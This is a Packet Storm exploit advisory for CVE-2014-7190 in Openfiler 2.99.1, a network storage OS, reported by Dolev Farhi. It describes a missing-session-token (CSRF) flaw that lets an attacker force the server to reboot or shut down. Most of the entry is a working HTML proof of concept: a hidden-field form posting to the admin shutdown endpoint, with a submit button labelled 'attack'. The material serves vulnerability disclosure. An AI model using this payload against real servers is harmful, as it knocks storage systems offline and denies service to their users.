Openfiler 2.99.1 Denial Of Service

2014-09-27T00:00:00
ID PACKETSTORM:128455
Type packetstorm
Reporter Dolev Farhi
Modified 2014-09-27T00:00:00

Description

                                        
                                            `# Exploit author: @dolevff  
# Vendor homepage: http://www.openfiler.com  
# Affected Software version: 2.99.1 (latest)  
# Alerted vendor: 7.5.14  
# CVE-2014-7190  
  
  
Software Description  
=====================  
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based  
Storage Area Networking functionality in a single cohesive framework.  
  
  
  
Vulnerability Description  
=========================  
it is possible to restart/shutdown a server running openfiler due to missing session tokens and cause a denial of service attack.  
  
  
  
proof of concept:  
=========================  
<html>  
<div align="center">  
<pre>  
<h2><b>DoS<b></h2>  
<body>  
<form  
action="https://ip.add.re.ss:446/admin/system_shutdown.html"  
method="POST">  
<input type="hidden" name="shutdowntype" value="reboot" />  
<input type="hidden" name="delay" value="0" />  
<input type="hidden" name="action" value="Shutdown" />  
<input type="submit" name="submit" value="attack" />  
</form>  
</body>  
</div>  
</html>  
  
  
  
`